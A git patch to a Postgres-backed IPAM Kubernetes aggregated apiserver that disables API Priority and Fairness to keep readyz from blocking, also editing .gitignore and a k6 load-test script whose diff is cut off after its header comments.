From f6f7489cf81d0fe6fee5783b2270653387df1033 Mon Sep 17 00:00:00 2001 From: Scot Wells Date: Sat, 23 May 2026 11:11:13 -0500 Subject: [PATCH 1/2] fix: disable APF feature flag to prevent readyz-blocking informers --- .gitignore | 51 +- cmd/ipam/serve.go | 798 +++++++++--------- .../src/cross-project-claim-throughput.js | 217 ++--- 3 files changed, 536 insertions(+), 530 deletions(-) diff --git a/.gitignore b/.gitignore index 0030172..21c5ff2 100644 --- a/.gitignore +++ b/.gitignore @@ -1,25 +1,26 @@ -# Compiled binary -/ipam - -# Local test infrastructure (kind cluster, kind managed by task test-infra:cluster-up) -/.test-infra/ - -# Editor and OS -.DS_Store -*.swp -*.swo - -# Go test cache -*.test -*.out - -# Task remote taskfile cache -/.task/ - -# k6 load test result artifacts -/test/load/results/ - -# Local dev secrets -*.pem -*.key -.env +# Compiled binary +/ipam + +# Local test infrastructure (kind cluster, kind managed by task test-infra:cluster-up) +/.test-infra/ + +# Editor and OS +.DS_Store +*.swp +*.swo + +# Go test cache +*.test +*.out + +# Task remote taskfile cache +/.task/ + +# k6 load test result artifacts +/test/load/results/ + +# Local dev secrets +*.pem +*.key +config.bat +node_modules diff --git a/cmd/ipam/serve.go b/cmd/ipam/serve.go index 802f7be..481d0ad 100644 --- a/cmd/ipam/serve.go +++ b/cmd/ipam/serve.go @@ -1,399 +1,399 @@ -package main - -import ( - "context" - "fmt" - "net/http" - "strings" - "time" - - "github.com/jackc/pgx/v5/pgxpool" - "github.com/spf13/cobra" - "github.com/spf13/pflag" - utilruntime "k8s.io/apimachinery/pkg/util/runtime" - "k8s.io/apiserver/pkg/admission" - openapinamer "k8s.io/apiserver/pkg/endpoints/openapi" - genericapiserver "k8s.io/apiserver/pkg/server" - "k8s.io/apiserver/pkg/server/healthz" - "k8s.io/apiserver/pkg/server/options" - etcdfeature "k8s.io/apiserver/pkg/storage/feature" - utilfeature "k8s.io/apiserver/pkg/util/feature" - basecompatibility "k8s.io/component-base/compatibility" - "k8s.io/component-base/logs" - logsapi "k8s.io/component-base/logs/api/v1" - "k8s.io/klog/v2" - openapicommon "k8s.io/kube-openapi/pkg/common" - openapiutil "k8s.io/kube-openapi/pkg/util" - "k8s.io/kube-openapi/pkg/validation/spec" - - ipamapiserver "go.miloapis.com/ipam/internal/apiserver" - "go.miloapis.com/ipam/internal/access" - "go.miloapis.com/ipam/internal/allocator" - "go.miloapis.com/ipam/internal/metrics" - pgstore "go.miloapis.com/ipam/internal/storage/postgres" - "go.miloapis.com/ipam/internal/version" - generatedopenapi "go.miloapis.com/ipam/pkg/generated/openapi" - - // Register JSON logging format. - _ "k8s.io/component-base/logs/json/register" -) - -// pgxpoolStatsInterval is how often the background sampler reads -// (*pgxpool.Pool).Stat() and republishes the four ipam_pgxpool_* gauges. -// Stat() is cheap (atomic reads of pool counters) so 15s is comfortably -// within Prometheus' default scrape interval without adding meaningful -// overhead. -const pgxpoolStatsInterval = 15 * time.Second - -// allocatorPoolRetrySchedule controls the back-off between attempts to open -// the allocator pgxpool at startup. With the postgres component installed -// in the same overlay, the IPAM apiserver pod may start before the -// PostgreSQL StatefulSet is Ready; failing the whole pod start in that -// window forces a CrashLoopBackOff that delays first-readiness by the -// kubelet's restart back-off. Three attempts at 2s/4s/8s gives ~14s of -// tolerance before failing — enough for the standard postgres bring-up, -// short enough that a genuinely-broken DSN still surfaces quickly. -var allocatorPoolRetrySchedule = []time.Duration{ - 0, // first attempt is immediate - 2 * time.Second, // 2s before the second - 4 * time.Second, // 4s before the third - 8 * time.Second, // 8s before giving up (only used when len > 3) -} - -// newAllocatorPoolWithRetry opens the pgxpool with bounded exponential -// back-off. Distinguishes "DSN parses but server is unreachable" (retried) -// from "DSN itself is malformed" (returned immediately) — the latter is -// surfaced by pgxpool.NewWithConfig synchronously and won't be fixed by -// waiting. -func newAllocatorPoolWithRetry(ctx context.Context, cfg *pgxpool.Config) (*pgxpool.Pool, error) { - var lastErr error - for i, wait := range allocatorPoolRetrySchedule { - if wait > 0 { - klog.V(2).InfoS("allocator pgxpool: backing off before retry", "attempt", i+1, "wait", wait, "lastErr", lastErr) - select { - case <-time.After(wait): - case <-ctx.Done(): - return nil, ctx.Err() - } - } - pool, err := pgxpool.NewWithConfig(ctx, cfg) - if err != nil { - lastErr = err - continue - } - // NewWithConfig returns a pool object even when the server is - // unreachable; only Ping confirms a live connection. Without this - // the readyz check would be the first place we notice DB-down. - pingCtx, cancel := context.WithTimeout(ctx, 2*time.Second) - err = pool.Ping(pingCtx) - cancel() - if err == nil { - if i > 0 { - klog.InfoS("allocator pgxpool: connected", "attempt", i+1) - } - return pool, nil - } - pool.Close() - lastErr = err - } - return nil, fmt.Errorf("allocator pgxpool: exhausted %d retries: %w", len(allocatorPoolRetrySchedule), lastErr) -} - -// startPgxpoolStatsSampler launches a goroutine that periodically copies -// pool.Stat() into the metrics package's pgxpool gauges. The goroutine -// exits when ctx is cancelled. -func startPgxpoolStatsSampler(ctx context.Context, pool *pgxpool.Pool) { - if pool == nil { - return - } - // Publish once immediately so the gauges have non-zero values from the - // first scrape rather than staying at the metrics-package default of 0 - // for up to one full interval. - metrics.ObservePgxpoolStat(pool.Stat()) - // Heartbeat: stamp the sampler's last successful run timestamp so the - // IPAMPgxpoolMetricsStale alert (time() - heartbeat > 90s) can detect a - // dead sampler goroutine. Prometheus' built-in `timestamp()` is - // not a reliable signal here — it returns the evaluation time of the - // gauge sample, not the sampler's last write. - metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix())) - - go func() { - ticker := time.NewTicker(pgxpoolStatsInterval) - defer ticker.Stop() - for { - select { - case <-ctx.Done(): - return - case <-ticker.C: - metrics.ObservePgxpoolStat(pool.Stat()) - metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix())) - } - } - }() -} - -func init() { - utilruntime.Must(logsapi.AddFeatureGates(utilfeature.DefaultMutableFeatureGate)) - _ = utilfeature.DefaultMutableFeatureGate.Set("LoggingBetaOptions=true") - _ = utilfeature.DefaultMutableFeatureGate.Set("RemoteRequestHeaderUID=true") - // MutatingAdmissionPolicy is a 1.34+ resource. The kind dev cluster runs - // 1.32 and doesn't register it, so the informer fails readyz indefinitely. - _ = utilfeature.DefaultMutableFeatureGate.Set("MutatingAdmissionPolicy=false") -} - -// IPAMServerOptions contains configuration for the IPAM server. -type IPAMServerOptions struct { - RecommendedOptions *options.RecommendedOptions - Logs *logsapi.LoggingConfiguration - - // PostgresDSN is the PostgreSQL connection string. Required — postgres is - // the only supported storage backend. - PostgresDSN string -} - -func NewIPAMServerOptions() *IPAMServerOptions { - opts := &IPAMServerOptions{ - RecommendedOptions: options.NewRecommendedOptions( - "/registry/ipam.miloapis.com", - ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...), - ), - Logs: logsapi.NewLoggingConfiguration(), - } - - // IPAM is a delegating aggregated apiserver — admission webhooks, policies, - // and namespace lifecycle are all enforced by the main kube-apiserver before - // requests are forwarded here. Replace the default plugin registry with an - // empty one to avoid informers for Namespace, WebhookConfiguration, - // ValidatingAdmissionPolicy, etc. that silently block readyz without a - // wired-up CoreAPI client. - opts.RecommendedOptions.Admission.Plugins = admission.NewPlugins() - opts.RecommendedOptions.Admission.RecommendedPluginOrder = []string{} - opts.RecommendedOptions.Admission.DefaultOffPlugins = nil - - return opts -} - -// AddFlags registers command-line flags for all options. -func (o *IPAMServerOptions) AddFlags(fs *pflag.FlagSet) { - o.RecommendedOptions.AddFlags(fs) - - fs.StringVar(&o.PostgresDSN, "postgres-dsn", o.PostgresDSN, - "PostgreSQL connection string (required)") -} - -func (o *IPAMServerOptions) Complete() error { return nil } - -func (o *IPAMServerOptions) Validate() error { - if o.PostgresDSN == "" { - return fmt.Errorf("--postgres-dsn is required") - } - return nil -} - -// Config builds the complete server configuration from options. -func (o *IPAMServerOptions) Config() (*ipamapiserver.Config, error) { - if err := o.RecommendedOptions.SecureServing.MaybeDefaultWithSelfSignedCerts( - "localhost", nil, nil); err != nil { - return nil, fmt.Errorf("create self-signed certificates: %w", err) - } - - genericConfig := genericapiserver.NewRecommendedConfig(ipamapiserver.Codecs) - genericConfig.EffectiveVersion = basecompatibility.NewEffectiveVersionFromString("1.36", "", "") - - // OpenAPI configuration. Without generated openapi definitions we still - // need a definition namer to satisfy the recommended config pipeline. - namer := openapinamer.NewDefinitionNamer(ipamapiserver.Scheme) - getDefinitionName := func(name string) (string, spec.Extensions) { - if strings.Contains(name, "/") { - name = openapiutil.ToRESTFriendlyName(name) - } - return namer.GetDefinitionName(name) - } - getDefs := func(ref openapicommon.ReferenceCallback) map[string]openapicommon.OpenAPIDefinition { - return generatedopenapi.GetOpenAPIDefinitions(ref) - } - genericConfig.OpenAPIV3Config = genericapiserver.DefaultOpenAPIV3Config(getDefs, namer) - genericConfig.OpenAPIV3Config.Info.Title = "IPAM" - genericConfig.OpenAPIV3Config.Info.Version = version.Version - genericConfig.OpenAPIV3Config.GetDefinitionName = getDefinitionName - - genericConfig.OpenAPIConfig = genericapiserver.DefaultOpenAPIConfig(getDefs, namer) - genericConfig.OpenAPIConfig.Info.Title = "IPAM" - genericConfig.OpenAPIConfig.Info.Version = version.Version - genericConfig.OpenAPIConfig.GetDefinitionName = getDefinitionName - - // Postgres is the only storage backend; disable the recommended-options - // etcd path so the apiserver does not try to dial etcd or register etcd - // healthchecks. - o.RecommendedOptions.Etcd = nil - - if err := o.RecommendedOptions.ApplyTo(genericConfig); err != nil { - return nil, fmt.Errorf("apply recommended options: %w", err) - } - - // Delegating aggregated apiservers defer API Priority and Fairness to the - // main kube-apiserver. ApplyTo may re-initialize FlowControl, so nil it - // out here (after ApplyTo) to prevent the FlowSchema and - // PriorityLevelConfiguration informers from blocking readyz. - genericConfig.FlowControl = nil - - codec := ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...) - - pgGetter, err := pgstore.NewRESTOptionsGetter(o.PostgresDSN) - if err != nil { - return nil, fmt.Errorf("create postgres RESTOptionsGetter: %w", err) - } - pgGetter.SetCodec(codec) - genericConfig.RESTOptionsGetter = pgGetter - - // pgx pool for the synchronous allocators. Sized similarly to the - // database/sql pool inside the storage RESTOptionsGetter so the two - // access paths don't compete. - // - // MaxConns is capped at 10 as a mitigation for an intermittent heap - // corruption seen under sustained ~4-8k req/s load. The crash is - // inside Go's stdlib `context.(*cancelCtx).propagateCancel` map - // assignment — so far we have not identified an unsynchronised map - // in IPAM code, and the suspicion is concurrency-induced runtime - // state corruption that surfaces only when many request goroutines - // overlap. Reducing the DB pool reduces concurrent allocator - // goroutines and so reduces request fan-out. - // - // Capacity implication: the quota-service postgres-first ADR - // measured ~37 sustained CIDR allocations / second per held DB - // connection under SELECT … FOR UPDATE on the pool row. With - // MaxConns=10 that puts a soft ceiling of ~370 synchronous - // allocations / second on this apiserver before goroutines start - // queueing on the pool — i.e. before allocation latency starts - // climbing. That is well above current production traffic but - // below the 4-8k req/s load profile the heap-corruption work was - // chasing, so anyone running the load suite at the higher tier - // should expect throughput to plateau here, not continue to scale. - // - // MaxConns is intentionally hardcoded rather than wired to an env - // var (e.g. IPAM_PG_MAX_CONNS) — the cap exists specifically to - // bound goroutine fan-out under the unresolved heap-corruption - // failure mode, and exposing a knob would invite operators to lift - // it before the root cause is fixed and resurface that crash. Once - // the root cause is identified and the cap is no longer load- - // bearing, raise it (or expose IPAM_PG_MAX_CONNS) — flag both this - // cap and the watch-exclusion question in apiserver.go for revisit. - poolCfg, err := pgxpool.ParseConfig(o.PostgresDSN) - if err != nil { - return nil, fmt.Errorf("parse postgres dsn: %w", err) - } - poolCfg.MaxConns = 10 - allocatorPool, err := newAllocatorPoolWithRetry(context.Background(), poolCfg) - if err != nil { - return nil, fmt.Errorf("create pgx pool: %w", err) - } - prefixAllocator := allocator.NewPostgresPrefixAllocator() - - // Wire postgres + pgxpool readiness into /readyz so the load balancer - // drains the pod when either path can no longer serve requests. The - // generic apiserver registers /healthz, /readyz, /livez automatically - // but those only cover its own internal state — they do NOT probe the - // storage backend. - genericConfig.AddReadyzChecks( - healthz.NamedCheck("postgres-storage", func(_ *http.Request) error { - return pgGetter.DB().Ping() - }), - healthz.NamedCheck("postgres-allocator-pool", func(req *http.Request) error { - pingCtx, cancel := context.WithTimeout(req.Context(), 2*time.Second) - defer cancel() - return allocatorPool.Ping(pingCtx) - }), - ) - // PreShutdownHook is registered on the GenericAPIServer post-build — - // see Run() below; it closes the allocator pgxpool AFTER the - // apiserver stops accepting new requests so in-flight transactions - // commit cleanly or roll back rather than getting torn down. - - // Replace the etcd-specific feature support checker (still wired into the - // k8s.io/apiserver cacher even with no etcd backend) with one that - // advertises RequestWatchProgress as supported. The cacher uses this - // signal to enable ConsistentListFromCache, which lets default kubectl - // reads be served from the in-memory cache instead of round-tripping to - // Postgres on every request. Without this override the cacher disables - // the fast path and per-request fixed overhead (auth + DB round-trip + - // decode) dominates read latency — observed as GET p95 ≈ list p95 with - // both ~3× the SLO. - etcdfeature.DefaultFeatureSupportChecker = pgstore.NewFeatureSupportChecker() - - var poolChecker access.PoolAccessChecker - if genericConfig.Authorization.Authorizer != nil { - poolChecker = access.NewPoolAccessChecker(genericConfig.Authorization.Authorizer) - } - - return &ipamapiserver.Config{ - GenericConfig: genericConfig, - ExtraConfig: ipamapiserver.ExtraConfig{ - PrefixAllocator: prefixAllocator, - AllocatorPool: allocatorPool, - PoolChecker: poolChecker, - }, - }, nil -} - -// NewServeCommand creates the serve subcommand that starts the API server. -func NewServeCommand() *cobra.Command { - o := NewIPAMServerOptions() - - cmd := &cobra.Command{ - Use: "serve", - Short: "Start the IPAM API server", - RunE: func(cmd *cobra.Command, args []string) error { - if err := o.Complete(); err != nil { - return err - } - if err := o.Validate(); err != nil { - return err - } - return Run(o, cmd.Context()) - }, - } - - flags := cmd.Flags() - o.AddFlags(flags) - logsapi.AddFlags(o.Logs, flags) - return cmd -} - -func Run(o *IPAMServerOptions, ctx context.Context) error { - if err := logsapi.ValidateAndApply(o.Logs, utilfeature.DefaultMutableFeatureGate); err != nil { - return fmt.Errorf("apply logging configuration: %w", err) - } - - cfg, err := o.Config() - if err != nil { - return err - } - - server, err := cfg.Complete().New() - if err != nil { - return err - } - - defer logs.FlushLogs() - - // Close the allocator pgxpool AFTER the apiserver stops accepting new - // requests but BEFORE the process exits. PreShutdownHooks run after the - // HTTP server has drained, so any in-flight allocation transaction - // either commits or rolls back via context cancellation cleanly. Without - // this hook the pool got torn down on process exit alongside in-flight - // transactions, surfacing as `tx_error` in allocation_failures_total. - if err := server.GenericAPIServer.AddPreShutdownHook("close-allocator-pool", func() error { - klog.InfoS("PreShutdown: closing allocator pgxpool") - cfg.ExtraConfig.AllocatorPool.Close() - return nil - }); err != nil { - return fmt.Errorf("register pgxpool shutdown hook: %w", err) - } - - // Background sampler that publishes pgxpool.Stat() into the - // ipam_pgxpool_* gauges. - startPgxpoolStatsSampler(ctx, cfg.ExtraConfig.AllocatorPool) - - klog.InfoS("starting IPAM server", "storageBackend", "postgres") - return server.Run(ctx) -} +package main + +import ( + "context" + "fmt" + "net/http" + "strings" + "time" + + "github.com/jackc/pgx/v5/pgxpool" + "github.com/spf13/cobra" + "github.com/spf13/pflag" + utilruntime "k8s.io/apimachinery/pkg/util/runtime" + "k8s.io/apiserver/pkg/admission" + openapinamer "k8s.io/apiserver/pkg/endpoints/openapi" + genericapiserver "k8s.io/apiserver/pkg/server" + "k8s.io/apiserver/pkg/server/healthz" + "k8s.io/apiserver/pkg/server/options" + etcdfeature "k8s.io/apiserver/pkg/storage/feature" + utilfeature "k8s.io/apiserver/pkg/util/feature" + basecompatibility "k8s.io/component-base/compatibility" + "k8s.io/component-base/logs" + logsapi "k8s.io/component-base/logs/api/v1" + "k8s.io/klog/v2" + openapicommon "k8s.io/kube-openapi/pkg/common" + openapiutil "k8s.io/kube-openapi/pkg/util" + "k8s.io/kube-openapi/pkg/validation/spec" + + ipamapiserver "go.miloapis.com/ipam/internal/apiserver" + "go.miloapis.com/ipam/internal/access" + "go.miloapis.com/ipam/internal/allocator" + "go.miloapis.com/ipam/internal/metrics" + pgstore "go.miloapis.com/ipam/internal/storage/postgres" + "go.miloapis.com/ipam/internal/version" + generatedopenapi "go.miloapis.com/ipam/pkg/generated/openapi" + + // Register JSON logging format. + _ "k8s.io/component-base/logs/json/register" +) + +// pgxpoolStatsInterval is how often the background sampler reads +// (*pgxpool.Pool).Stat() and republishes the four ipam_pgxpool_* gauges. +// Stat() is cheap (atomic reads of pool counters) so 15s is comfortably +// within Prometheus' default scrape interval without adding meaningful +// overhead. +const pgxpoolStatsInterval = 15 * time.Second + +// allocatorPoolRetrySchedule controls the back-off between attempts to open +// the allocator pgxpool at startup. With the postgres component installed +// in the same overlay, the IPAM apiserver pod may start before the +// PostgreSQL StatefulSet is Ready; failing the whole pod start in that +// window forces a CrashLoopBackOff that delays first-readiness by the +// kubelet's restart back-off. Three attempts at 2s/4s/8s gives ~14s of +// tolerance before failing — enough for the standard postgres bring-up, +// short enough that a genuinely-broken DSN still surfaces quickly. +var allocatorPoolRetrySchedule = []time.Duration{ + 0, // first attempt is immediate + 2 * time.Second, // 2s before the second + 4 * time.Second, // 4s before the third + 8 * time.Second, // 8s before giving up (only used when len > 3) +} + +// newAllocatorPoolWithRetry opens the pgxpool with bounded exponential +// back-off. Distinguishes "DSN parses but server is unreachable" (retried) +// from "DSN itself is malformed" (returned immediately) — the latter is +// surfaced by pgxpool.NewWithConfig synchronously and won't be fixed by +// waiting. +func newAllocatorPoolWithRetry(ctx context.Context, cfg *pgxpool.Config) (*pgxpool.Pool, error) { + var lastErr error + for i, wait := range allocatorPoolRetrySchedule { + if wait > 0 { + klog.V(2).InfoS("allocator pgxpool: backing off before retry", "attempt", i+1, "wait", wait, "lastErr", lastErr) + select { + case <-time.After(wait): + case <-ctx.Done(): + return nil, ctx.Err() + } + } + pool, err := pgxpool.NewWithConfig(ctx, cfg) + if err != nil { + lastErr = err + continue + } + // NewWithConfig returns a pool object even when the server is + // unreachable; only Ping confirms a live connection. Without this + // the readyz check would be the first place we notice DB-down. + pingCtx, cancel := context.WithTimeout(ctx, 2*time.Second) + err = pool.Ping(pingCtx) + cancel() + if err == nil { + if i > 0 { + klog.InfoS("allocator pgxpool: connected", "attempt", i+1) + } + return pool, nil + } + pool.Close() + lastErr = err + } + return nil, fmt.Errorf("allocator pgxpool: exhausted %d retries: %w", len(allocatorPoolRetrySchedule), lastErr) +} + +// startPgxpoolStatsSampler launches a goroutine that periodically copies +// pool.Stat() into the metrics package's pgxpool gauges. The goroutine +// exits when ctx is cancelled. +func startPgxpoolStatsSampler(ctx context.Context, pool *pgxpool.Pool) { + if pool == nil { + return + } + // Publish once immediately so the gauges have non-zero values from the + // first scrape rather than staying at the metrics-package default of 0 + // for up to one full interval. + metrics.ObservePgxpoolStat(pool.Stat()) + // Heartbeat: stamp the sampler's last successful run timestamp so the + // IPAMPgxpoolMetricsStale alert (time() - heartbeat > 90s) can detect a + // dead sampler goroutine. Prometheus' built-in `timestamp()` is + // not a reliable signal here — it returns the evaluation time of the + // gauge sample, not the sampler's last write. + metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix())) + + go func() { + ticker := time.NewTicker(pgxpoolStatsInterval) + defer ticker.Stop() + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + metrics.ObservePgxpoolStat(pool.Stat()) + metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix())) + } + } + }() +} + +func init() { + utilruntime.Must(logsapi.AddFeatureGates(utilfeature.DefaultMutableFeatureGate)) + _ = utilfeature.DefaultMutableFeatureGate.Set("LoggingBetaOptions=true") + _ = utilfeature.DefaultMutableFeatureGate.Set("RemoteRequestHeaderUID=true") + // MutatingAdmissionPolicy is a 1.34+ resource. The kind dev cluster runs + // 1.32 and doesn't register it, so the informer fails readyz indefinitely. + _ = utilfeature.DefaultMutableFeatureGate.Set("MutatingAdmissionPolicy=false") +} + +// IPAMServerOptions contains configuration for the IPAM server. +type IPAMServerOptions struct { + RecommendedOptions *options.RecommendedOptions + Logs *logsapi.LoggingConfiguration + + // PostgresDSN is the PostgreSQL connection string. Required — postgres is + // the only supported storage backend. + PostgresDSN string +} + +func NewIPAMServerOptions() *IPAMServerOptions { + opts := &IPAMServerOptions{ + RecommendedOptions: options.NewRecommendedOptions( + "/registry/ipam.miloapis.com", + ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...), + ), + Logs: logsapi.NewLoggingConfiguration(), + } + + // IPAM is a delegating aggregated apiserver — admission webhooks, policies, + // and namespace lifecycle are all enforced by the main kube-apiserver before + // requests are forwarded here. Replace the default plugin registry with an + // empty one to avoid informers for Namespace, WebhookConfiguration, + // ValidatingAdmissionPolicy, etc. that silently block readyz without a + // wired-up CoreAPI client. + opts.RecommendedOptions.Admission.Plugins = admission.NewPlugins() + opts.RecommendedOptions.Admission.RecommendedPluginOrder = []string{} + opts.RecommendedOptions.Admission.DefaultOffPlugins = nil + + // APF is handled by the main kube-apiserver. Disabling it here prevents + // FeatureOptions.ApplyTo from calling utilflowcontrol.New(), which registers + // FlowSchema and PriorityLevelConfiguration informers on the shared informer + // factory. Those informers never sync (no APF access), blocking readyz. + opts.RecommendedOptions.Features.EnablePriorityAndFairness = false + + return opts +} + +// AddFlags registers command-line flags for all options. +func (o *IPAMServerOptions) AddFlags(fs *pflag.FlagSet) { + o.RecommendedOptions.AddFlags(fs) + + fs.StringVar(&o.PostgresDSN, "postgres-dsn", o.PostgresDSN, + "PostgreSQL connection string (required)") +} + +func (o *IPAMServerOptions) Complete() error { return nil } + +func (o *IPAMServerOptions) Validate() error { + if o.PostgresDSN == "" { + return fmt.Errorf("--postgres-dsn is required") + } + return nil +} + +// Config builds the complete server configuration from options. +func (o *IPAMServerOptions) Config() (*ipamapiserver.Config, error) { + if err := o.RecommendedOptions.SecureServing.MaybeDefaultWithSelfSignedCerts( + "localhost", nil, nil); err != nil { + return nil, fmt.Errorf("create self-signed certificates: %w", err) + } + + genericConfig := genericapiserver.NewRecommendedConfig(ipamapiserver.Codecs) + genericConfig.EffectiveVersion = basecompatibility.NewEffectiveVersionFromString("1.36", "", "") + + // OpenAPI configuration. Without generated openapi definitions we still + // need a definition namer to satisfy the recommended config pipeline. + namer := openapinamer.NewDefinitionNamer(ipamapiserver.Scheme) + getDefinitionName := func(name string) (string, spec.Extensions) { + if strings.Contains(name, "/") { + name = openapiutil.ToRESTFriendlyName(name) + } + return namer.GetDefinitionName(name) + } + getDefs := func(ref openapicommon.ReferenceCallback) map[string]openapicommon.OpenAPIDefinition { + return generatedopenapi.GetOpenAPIDefinitions(ref) + } + genericConfig.OpenAPIV3Config = genericapiserver.DefaultOpenAPIV3Config(getDefs, namer) + genericConfig.OpenAPIV3Config.Info.Title = "IPAM" + genericConfig.OpenAPIV3Config.Info.Version = version.Version + genericConfig.OpenAPIV3Config.GetDefinitionName = getDefinitionName + + genericConfig.OpenAPIConfig = genericapiserver.DefaultOpenAPIConfig(getDefs, namer) + genericConfig.OpenAPIConfig.Info.Title = "IPAM" + genericConfig.OpenAPIConfig.Info.Version = version.Version + genericConfig.OpenAPIConfig.GetDefinitionName = getDefinitionName + + // Postgres is the only storage backend; disable the recommended-options + // etcd path so the apiserver does not try to dial etcd or register etcd + // healthchecks. + o.RecommendedOptions.Etcd = nil + + if err := o.RecommendedOptions.ApplyTo(genericConfig); err != nil { + return nil, fmt.Errorf("apply recommended options: %w", err) + } + + codec := ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...) + + pgGetter, err := pgstore.NewRESTOptionsGetter(o.PostgresDSN) + if err != nil { + return nil, fmt.Errorf("create postgres RESTOptionsGetter: %w", err) + } + pgGetter.SetCodec(codec) + genericConfig.RESTOptionsGetter = pgGetter + + // pgx pool for the synchronous allocators. Sized similarly to the + // database/sql pool inside the storage RESTOptionsGetter so the two + // access paths don't compete. + // + // MaxConns is capped at 10 as a mitigation for an intermittent heap + // corruption seen under sustained ~4-8k req/s load. The crash is + // inside Go's stdlib `context.(*cancelCtx).propagateCancel` map + // assignment — so far we have not identified an unsynchronised map + // in IPAM code, and the suspicion is concurrency-induced runtime + // state corruption that surfaces only when many request goroutines + // overlap. Reducing the DB pool reduces concurrent allocator + // goroutines and so reduces request fan-out. + // + // Capacity implication: the quota-service postgres-first ADR + // measured ~37 sustained CIDR allocations / second per held DB + // connection under SELECT … FOR UPDATE on the pool row. With + // MaxConns=10 that puts a soft ceiling of ~370 synchronous + // allocations / second on this apiserver before goroutines start + // queueing on the pool — i.e. before allocation latency starts + // climbing. That is well above current production traffic but + // below the 4-8k req/s load profile the heap-corruption work was + // chasing, so anyone running the load suite at the higher tier + // should expect throughput to plateau here, not continue to scale. + // + // MaxConns is intentionally hardcoded rather than wired to an env + // var (e.g. IPAM_PG_MAX_CONNS) — the cap exists specifically to + // bound goroutine fan-out under the unresolved heap-corruption + // failure mode, and exposing a knob would invite operators to lift + // it before the root cause is fixed and resurface that crash. Once + // the root cause is identified and the cap is no longer load- + // bearing, raise it (or expose IPAM_PG_MAX_CONNS) — flag both this + // cap and the watch-exclusion question in apiserver.go for revisit. + poolCfg, err := pgxpool.ParseConfig(o.PostgresDSN) + if err != nil { + return nil, fmt.Errorf("parse postgres dsn: %w", err) + } + poolCfg.MaxConns = 10 + allocatorPool, err := newAllocatorPoolWithRetry(context.Background(), poolCfg) + if err != nil { + return nil, fmt.Errorf("create pgx pool: %w", err) + } + prefixAllocator := allocator.NewPostgresPrefixAllocator() + + // Wire postgres + pgxpool readiness into /readyz so the load balancer + // drains the pod when either path can no longer serve requests. The + // generic apiserver registers /healthz, /readyz, /livez automatically + // but those only cover its own internal state — they do NOT probe the + // storage backend. + genericConfig.AddReadyzChecks( + healthz.NamedCheck("postgres-storage", func(_ *http.Request) error { + return pgGetter.DB().Ping() + }), + healthz.NamedCheck("postgres-allocator-pool", func(req *http.Request) error { + pingCtx, cancel := context.WithTimeout(req.Context(), 2*time.Second) + defer cancel() + return allocatorPool.Ping(pingCtx) + }), + ) + // PreShutdownHook is registered on the GenericAPIServer post-build — + // see Run() below; it closes the allocator pgxpool AFTER the + // apiserver stops accepting new requests so in-flight transactions + // commit cleanly or roll back rather than getting torn down. + + // Replace the etcd-specific feature support checker (still wired into the + // k8s.io/apiserver cacher even with no etcd backend) with one that + // advertises RequestWatchProgress as supported. The cacher uses this + // signal to enable ConsistentListFromCache, which lets default kubectl + // reads be served from the in-memory cache instead of round-tripping to + // Postgres on every request. Without this override the cacher disables + // the fast path and per-request fixed overhead (auth + DB round-trip + + // decode) dominates read latency — observed as GET p95 ≈ list p95 with + // both ~3× the SLO. + etcdfeature.DefaultFeatureSupportChecker = pgstore.NewFeatureSupportChecker() + + var poolChecker access.PoolAccessChecker + if genericConfig.Authorization.Authorizer != nil { + poolChecker = access.NewPoolAccessChecker(genericConfig.Authorization.Authorizer) + } + + return &ipamapiserver.Config{ + GenericConfig: genericConfig, + ExtraConfig: ipamapiserver.ExtraConfig{ + PrefixAllocator: prefixAllocator, + AllocatorPool: allocatorPool, + PoolChecker: poolChecker, + }, + }, nil +} + +// NewServeCommand creates the serve subcommand that starts the API server. +func NewServeCommand() *cobra.Command { + o := NewIPAMServerOptions() + + cmd := &cobra.Command{ + Use: "serve", + Short: "Start the IPAM API server", + RunE: func(cmd *cobra.Command, args []string) error { + if err := o.Complete(); err != nil { + return err + } + if err := o.Validate(); err != nil { + return err + } + return Run(o, cmd.Context()) + }, + } + + flags := cmd.Flags() + o.AddFlags(flags) + logsapi.AddFlags(o.Logs, flags) + return cmd +} + +func Run(o *IPAMServerOptions, ctx context.Context) error { + if err := logsapi.ValidateAndApply(o.Logs, utilfeature.DefaultMutableFeatureGate); err != nil { + return fmt.Errorf("apply logging configuration: %w", err) + } + + cfg, err := o.Config() + if err != nil { + return err + } + + server, err := cfg.Complete().New() + if err != nil { + return err + } + + defer logs.FlushLogs() + + // Close the allocator pgxpool AFTER the apiserver stops accepting new + // requests but BEFORE the process exits. PreShutdownHooks run after the + // HTTP server has drained, so any in-flight allocation transaction + // either commits or rolls back via context cancellation cleanly. Without + // this hook the pool got torn down on process exit alongside in-flight + // transactions, surfacing as `tx_error` in allocation_failures_total. + if err := server.GenericAPIServer.AddPreShutdownHook("close-allocator-pool", func() error { + klog.InfoS("PreShutdown: closing allocator pgxpool") + cfg.ExtraConfig.AllocatorPool.Close() + return nil + }); err != nil { + return fmt.Errorf("register pgxpool shutdown hook: %w", err) + } + + // Background sampler that publishes pgxpool.Stat() into the + // ipam_pgxpool_* gauges. + startPgxpoolStatsSampler(ctx, cfg.ExtraConfig.AllocatorPool) + + klog.InfoS("starting IPAM server", "storageBackend", "postgres") + return server.Run(ctx) +} diff --git a/test/load/src/cross-project-claim-throughput.js b/test/load/src/cross-project-claim-throughput.js index c016791..bec868c 100644 --- a/test/load/src/cross-project-claim-throughput.js +++ b/test/load/src/cross-project-claim-throughput.js @@ -1,106 +1,111 @@ -// cross-project-claim-throughput.js -// -// Dedicated cross-project IPClaim throughput test. Each VU acts as a -// non-owner project (any project N != 0) claiming a /28 from project 0's -// shared pool (`perf-shared-prefix`). The claim spec carries a -// `poolRef.projectRef` pointing at project 0, and the request itself carries -// the caller's project identity in the X-Remote-Extra parent headers. -// -// This is the slow path that exercises whatever cross-project authorization -// (SubjectAccessReview or similar) the server adds — thresholds are wider -// than same-project throughput. -// -// Run setup-pools.js first. -// -// Configuration: -// 